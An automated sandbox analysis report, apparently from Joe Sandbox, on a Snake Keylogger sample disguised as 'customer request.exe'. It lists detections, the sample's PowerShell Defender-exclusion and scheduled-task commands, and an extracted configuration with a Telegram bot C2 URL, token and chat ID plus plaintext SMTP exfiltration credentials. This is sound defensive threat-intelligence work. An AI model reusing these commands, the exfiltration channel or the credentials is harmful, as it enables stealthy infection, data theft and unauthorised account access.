Edit tour

Windows Analysis Report
customer request.exe

Overview

General Information

Sample name:	customer request.exe
Analysis ID:	1618311
MD5:	cda26758d383d4440f407947e1bc38fe
SHA1:	f159f961491285f6f02e483f65644fc8e145090e
SHA256:	c2faf91bcc8b5f17406999a077c5836086be968b46ad6ff855f99f22dbb41adb
Tags:	exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

customer request.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\customer request.exe" MD5: CDA26758D383D4440F407947E1BC38FE)

powershell.exe (PID: 5344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7232 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 2084 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

customer request.exe (PID: 1908 cmdline: "C:\Users\user\Desktop\customer request.exe" MD5: CDA26758D383D4440F407947E1BC38FE)

tjvxuavKFXO.exe (PID: 7348 cmdline: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe MD5: CDA26758D383D4440F407947E1BC38FE)

schtasks.exe (PID: 7436 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tjvxuavKFXO.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe" MD5: CDA26758D383D4440F407947E1BC38FE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendMessage?chat_id=6939220311", "Username": "muhasebe@gzdled.com.tr", "Password": "Gozdeled1048", "Host": "mail.gzdled.com.tr", "Port": "587", "Token": "7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc", "Chat_id": "6939220311", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.4133954704.000000000040D000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x9816:$a1: get_encryptedPassword 0x9b02:$a2: get_encryptedUsername 0x9622:$a3: get_timePasswordChanged 0x971d:$a4: get_passwordField 0x982c:$a5: set_encryptedPassword 0xae63:$a7: get_logins 0xadc6:$a10: KeyLoggerEventArgs 0xaa31:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.4137608364.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x96c:$x1: $%SMTPDV$ 0x914:$x3: %FTPDV$ 0x938:$m2: Clipboard Logs ID 0xb76:$m2: Screenshot Logs ID 0xc86:$m2: keystroke Logs ID 0xf60:$m3: SnakePW 0xb4e:$m4: \SnakeKeylogger\
0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x153c6:$a1: get_encryptedPassword 0x156b2:$a2: get_encryptedUsername 0x151d2:$a3: get_timePasswordChanged 0x152cd:$a4: get_passwordField 0x153dc:$a5: set_encryptedPassword 0x16a13:$a7: get_logins 0x16976:$a10: KeyLoggerEventArgs 0x165e1:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a51c:$x1: $%SMTPDV$ 0x18dac:$x2: $#TheHashHere%& 0x1a4c4:$x3: %FTPDV$ 0x18d4c:$x4: $%TelegramDv$ 0x165e1:$x5: KeyLoggerEventArgs 0x16976:$x5: KeyLoggerEventArgs 0x1a4e8:$m2: Clipboard Logs ID 0x1a726:$m2: Screenshot Logs ID 0x1a836:$m2: keystroke Logs ID 0x1ab10:$m3: SnakePW 0x1a6fe:$m4: \SnakeKeylogger\
0000000D.00000002.4133955446.000000000041C000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.4137995845.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000D.00000002.4137995845.0000000002E74000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4137608364.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14f7e:$a1: get_encryptedPassword 0x35b9e:$a1: get_encryptedPassword 0x565be:$a1: get_encryptedPassword 0x1526a:$a2: get_encryptedUsername 0x35e8a:$a2: get_encryptedUsername 0x568aa:$a2: get_encryptedUsername 0x14d8a:$a3: get_timePasswordChanged 0x359aa:$a3: get_timePasswordChanged 0x563ca:$a3: get_timePasswordChanged 0x14e85:$a4: get_passwordField 0x35aa5:$a4: get_passwordField 0x564c5:$a4: get_passwordField 0x14f94:$a5: set_encryptedPassword 0x35bb4:$a5: set_encryptedPassword 0x565d4:$a5: set_encryptedPassword 0x165cb:$a7: get_logins 0x371eb:$a7: get_logins 0x57c0b:$a7: get_logins 0x1652e:$a10: KeyLoggerEventArgs 0x3714e:$a10: KeyLoggerEventArgs 0x57b6e:$a10: KeyLoggerEventArgs
00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a0d4:$x1: $%SMTPDV$ 0x3acf4:$x1: $%SMTPDV$ 0x5b714:$x1: $%SMTPDV$ 0x18964:$x2: $#TheHashHere%& 0x39584:$x2: $#TheHashHere%& 0x59fa4:$x2: $#TheHashHere%& 0x1a07c:$x3: %FTPDV$ 0x3ac9c:$x3: %FTPDV$ 0x5b6bc:$x3: %FTPDV$ 0x18904:$x4: $%TelegramDv$ 0x39524:$x4: $%TelegramDv$ 0x59f44:$x4: $%TelegramDv$ 0x16199:$x5: KeyLoggerEventArgs 0x1652e:$x5: KeyLoggerEventArgs 0x36db9:$x5: KeyLoggerEventArgs 0x3714e:$x5: KeyLoggerEventArgs 0x577d9:$x5: KeyLoggerEventArgs 0x57b6e:$x5: KeyLoggerEventArgs 0x1a0a0:$m2: Clipboard Logs ID 0x1a2de:$m2: Screenshot Logs ID 0x1a3ee:$m2: keystroke Logs ID
0000000D.00000002.4133955446.000000000041A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x155fe:$a1: get_encryptedPassword 0x3601e:$a1: get_encryptedPassword 0x158ea:$a2: get_encryptedUsername 0x3630a:$a2: get_encryptedUsername 0x1540a:$a3: get_timePasswordChanged 0x35e2a:$a3: get_timePasswordChanged 0x15505:$a4: get_passwordField 0x35f25:$a4: get_passwordField 0x15614:$a5: set_encryptedPassword 0x36034:$a5: set_encryptedPassword 0x16c4b:$a7: get_logins 0x3766b:$a7: get_logins 0x16bae:$a10: KeyLoggerEventArgs 0x375ce:$a10: KeyLoggerEventArgs 0x16819:$a11: KeyLoggerEventArgsEventHandler 0x37239:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a754:$x1: $%SMTPDV$ 0x3b174:$x1: $%SMTPDV$ 0x18fe4:$x2: $#TheHashHere%& 0x39a04:$x2: $#TheHashHere%& 0x1a6fc:$x3: %FTPDV$ 0x3b11c:$x3: %FTPDV$ 0x18f84:$x4: $%TelegramDv$ 0x399a4:$x4: $%TelegramDv$ 0x16819:$x5: KeyLoggerEventArgs 0x16bae:$x5: KeyLoggerEventArgs 0x37239:$x5: KeyLoggerEventArgs 0x375ce:$x5: KeyLoggerEventArgs 0x1a720:$m2: Clipboard Logs ID 0x1a95e:$m2: Screenshot Logs ID 0x1aa6e:$m2: keystroke Logs ID 0x3b140:$m2: Clipboard Logs ID 0x3b37e:$m2: Screenshot Logs ID 0x3b48e:$m2: keystroke Logs ID 0x1ad48:$m3: SnakePW 0x3b768:$m3: SnakePW 0x1a936:$m4: \SnakeKeylogger\
00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: customer request.exe PID: 6848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: customer request.exe PID: 6848	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: customer request.exe PID: 6848	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: customer request.exe PID: 6848	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36920:$a1: get_encryptedPassword 0x36c02:$a2: get_encryptedUsername 0x36736:$a3: get_timePasswordChanged 0x36831:$a4: get_passwordField 0x36936:$a5: set_encryptedPassword 0x38f14:$a7: get_logins 0x38e77:$a10: KeyLoggerEventArgs 0x38ae2:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: customer request.exe PID: 6848	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x38ae2:$x5: KeyLoggerEventArgs 0x38e77:$x5: KeyLoggerEventArgs 0x3977e:$x5: KeyLoggerEventArgs 0x39adf:$x5: KeyLoggerEventArgs 0x3b150:$m2: Clipboard Logs ID 0x3b256:$m2: Screenshot Logs ID 0x3b2ac:$m2: keystroke Logs ID 0x3b3e1:$m3: SnakePW 0x3b242:$m4: \SnakeKeylogger\
Process Memory Space: customer request.exe PID: 1908	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: customer request.exe PID: 1908	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: customer request.exe PID: 1908	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: customer request.exe PID: 1908	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xdf67:$a1: get_encryptedPassword 0xe249:$a2: get_encryptedUsername 0xdd7d:$a3: get_timePasswordChanged 0xde78:$a4: get_passwordField 0xdf7d:$a5: set_encryptedPassword 0x1055b:$a7: get_logins 0x104be:$a10: KeyLoggerEventArgs 0x10129:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: customer request.exe PID: 1908	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x10129:$x5: KeyLoggerEventArgs 0x104be:$x5: KeyLoggerEventArgs 0x10dc5:$x5: KeyLoggerEventArgs 0x11126:$x5: KeyLoggerEventArgs 0x2841b:$m2: Clipboard Logs ID 0x28521:$m2: Screenshot Logs ID 0x28577:$m2: keystroke Logs ID 0x8d9:$m3: SnakePW 0xae9:$m3: SnakePW 0xd0b:$m3: SnakePW 0x13427:$m3: SnakePW 0x286ac:$m3: SnakePW 0x2bf5a:$m3: SnakePW 0x401cc:$m3: SnakePW 0x405f4:$m3: SnakePW 0x408b2:$m3: SnakePW 0x2850d:$m4: \SnakeKeylogger\
Process Memory Space: tjvxuavKFXO.exe PID: 7348	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: tjvxuavKFXO.exe PID: 7348	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: tjvxuavKFXO.exe PID: 7348	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: tjvxuavKFXO.exe PID: 7348	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb47e:$a1: get_encryptedPassword 0x43b92:$a1: get_encryptedPassword 0xb760:$a2: get_encryptedUsername 0x43e74:$a2: get_encryptedUsername 0xb294:$a3: get_timePasswordChanged 0x439a8:$a3: get_timePasswordChanged 0xb38f:$a4: get_passwordField 0x43aa3:$a4: get_passwordField 0xb494:$a5: set_encryptedPassword 0x43ba8:$a5: set_encryptedPassword 0xda72:$a7: get_logins 0x46186:$a7: get_logins 0xd9d5:$a10: KeyLoggerEventArgs 0x460e9:$a10: KeyLoggerEventArgs 0xd640:$a11: KeyLoggerEventArgsEventHandler 0x45d54:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: tjvxuavKFXO.exe PID: 7348	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xd640:$x5: KeyLoggerEventArgs 0xd9d5:$x5: KeyLoggerEventArgs 0xe2dc:$x5: KeyLoggerEventArgs 0xe63d:$x5: KeyLoggerEventArgs 0x45d54:$x5: KeyLoggerEventArgs 0x460e9:$x5: KeyLoggerEventArgs 0x469f0:$x5: KeyLoggerEventArgs 0x46d51:$x5: KeyLoggerEventArgs 0xfcae:$m2: Clipboard Logs ID 0xfdb4:$m2: Screenshot Logs ID 0xfe0a:$m2: keystroke Logs ID 0x483c2:$m2: Clipboard Logs ID 0x484c8:$m2: Screenshot Logs ID 0x4851e:$m2: keystroke Logs ID 0xff3f:$m3: SnakePW 0x48653:$m3: SnakePW 0xfda0:$m4: \SnakeKeylogger\ 0x484b4:$m4: \SnakeKeylogger\
Process Memory Space: tjvxuavKFXO.exe PID: 7488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: tjvxuavKFXO.exe PID: 7488	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: tjvxuavKFXO.exe PID: 7488	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 40 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a16:$a1: get_encryptedPassword 0x14d02:$a2: get_encryptedUsername 0x14822:$a3: get_timePasswordChanged 0x1491d:$a4: get_passwordField 0x14a2c:$a5: set_encryptedPassword 0x16063:$a7: get_logins 0x15fc6:$a10: KeyLoggerEventArgs 0x15c31:$a11: KeyLoggerEventArgsEventHandler
10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c55a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b78c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bbbf:$a4: \Orbitum\User Data\Default\Login Data 0x1cbfe:$a5: \Kometa\User Data\Default\Login Data
10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155d8:$s1: UnHook 0x155df:$s2: SetHook 0x155e7:$s3: CallNextHook 0x155f4:$s4: _hook
10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b6c:$x1: $%SMTPDV$ 0x183fc:$x2: $#TheHashHere%& 0x19b14:$x3: %FTPDV$ 0x1839c:$x4: $%TelegramDv$ 0x15c31:$x5: KeyLoggerEventArgs 0x15fc6:$x5: KeyLoggerEventArgs 0x19b38:$m2: Clipboard Logs ID 0x19d76:$m2: Screenshot Logs ID 0x19e86:$m2: keystroke Logs ID 0x1a160:$m3: SnakePW 0x19d4e:$m4: \SnakeKeylogger\
8.2.customer request.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.customer request.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a16:$a1: get_encryptedPassword 0x14d02:$a2: get_encryptedUsername 0x14822:$a3: get_timePasswordChanged 0x1491d:$a4: get_passwordField 0x14a2c:$a5: set_encryptedPassword 0x16063:$a7: get_logins 0x15fc6:$a10: KeyLoggerEventArgs 0x15c31:$a11: KeyLoggerEventArgsEventHandler
8.2.customer request.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155d8:$s1: UnHook 0x155df:$s2: SetHook 0x155e7:$s3: CallNextHook 0x155f4:$s4: _hook
8.2.customer request.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b6c:$x1: $%SMTPDV$ 0x19b14:$x3: %FTPDV$ 0x15c31:$x5: KeyLoggerEventArgs 0x15fc6:$x5: KeyLoggerEventArgs 0x19b38:$m2: Clipboard Logs ID 0x19d76:$m2: Screenshot Logs ID 0x19e86:$m2: keystroke Logs ID 0x1a160:$m3: SnakePW 0x19d4e:$m4: \SnakeKeylogger\
0.2.customer request.exe.4d3e188.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.customer request.exe.4d3e188.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.customer request.exe.4d3e188.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c16:$a1: get_encryptedPassword 0x12f02:$a2: get_encryptedUsername 0x12a22:$a3: get_timePasswordChanged 0x12b1d:$a4: get_passwordField 0x12c2c:$a5: set_encryptedPassword 0x14263:$a7: get_logins 0x141c6:$a10: KeyLoggerEventArgs 0x13e31:$a11: KeyLoggerEventArgsEventHandler
0.2.customer request.exe.4d3e188.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a75a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1998c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19dbf:$a4: \Orbitum\User Data\Default\Login Data 0x1adfe:$a5: \Kometa\User Data\Default\Login Data
0.2.customer request.exe.4d3e188.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137d8:$s1: UnHook 0x137df:$s2: SetHook 0x137e7:$s3: CallNextHook 0x137f4:$s4: _hook
0.2.customer request.exe.4d3e188.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d6c:$x1: $%SMTPDV$ 0x165fc:$x2: $#TheHashHere%& 0x17d14:$x3: %FTPDV$ 0x1659c:$x4: $%TelegramDv$ 0x13e31:$x5: KeyLoggerEventArgs 0x141c6:$x5: KeyLoggerEventArgs 0x17d38:$m2: Clipboard Logs ID 0x17f76:$m2: Screenshot Logs ID 0x18086:$m2: keystroke Logs ID 0x18360:$m3: SnakePW 0x17f4e:$m4: \SnakeKeylogger\
0.2.customer request.exe.4d1d568.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.customer request.exe.4d1d568.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c16:$a1: get_encryptedPassword 0x12f02:$a2: get_encryptedUsername 0x12a22:$a3: get_timePasswordChanged 0x12b1d:$a4: get_passwordField 0x12c2c:$a5: set_encryptedPassword 0x14263:$a7: get_logins 0x141c6:$a10: KeyLoggerEventArgs 0x13e31:$a11: KeyLoggerEventArgsEventHandler
0.2.customer request.exe.4d1d568.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c16:$a1: get_encryptedPassword 0x12f02:$a2: get_encryptedUsername 0x12a22:$a3: get_timePasswordChanged 0x12b1d:$a4: get_passwordField 0x12c2c:$a5: set_encryptedPassword 0x14263:$a7: get_logins 0x141c6:$a10: KeyLoggerEventArgs 0x13e31:$a11: KeyLoggerEventArgsEventHandler
10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a75a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1998c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19dbf:$a4: \Orbitum\User Data\Default\Login Data 0x1adfe:$a5: \Kometa\User Data\Default\Login Data
0.2.customer request.exe.4d1d568.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a75a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1998c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19dbf:$a4: \Orbitum\User Data\Default\Login Data 0x1adfe:$a5: \Kometa\User Data\Default\Login Data
10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137d8:$s1: UnHook 0x137df:$s2: SetHook 0x137e7:$s3: CallNextHook 0x137f4:$s4: _hook
10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d6c:$x1: $%SMTPDV$ 0x165fc:$x2: $#TheHashHere%& 0x17d14:$x3: %FTPDV$ 0x1659c:$x4: $%TelegramDv$ 0x13e31:$x5: KeyLoggerEventArgs 0x141c6:$x5: KeyLoggerEventArgs 0x17d38:$m2: Clipboard Logs ID 0x17f76:$m2: Screenshot Logs ID 0x18086:$m2: keystroke Logs ID 0x18360:$m3: SnakePW 0x17f4e:$m4: \SnakeKeylogger\
0.2.customer request.exe.4d1d568.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137d8:$s1: UnHook 0x137df:$s2: SetHook 0x137e7:$s3: CallNextHook 0x137f4:$s4: _hook
0.2.customer request.exe.4d1d568.5.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d6c:$x1: $%SMTPDV$ 0x165fc:$x2: $#TheHashHere%& 0x17d14:$x3: %FTPDV$ 0x1659c:$x4: $%TelegramDv$ 0x13e31:$x5: KeyLoggerEventArgs 0x141c6:$x5: KeyLoggerEventArgs 0x17d38:$m2: Clipboard Logs ID 0x17f76:$m2: Screenshot Logs ID 0x18086:$m2: keystroke Logs ID 0x18360:$m3: SnakePW 0x17f4e:$m4: \SnakeKeylogger\
10.2.tjvxuavKFXO.exe.4b999b0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
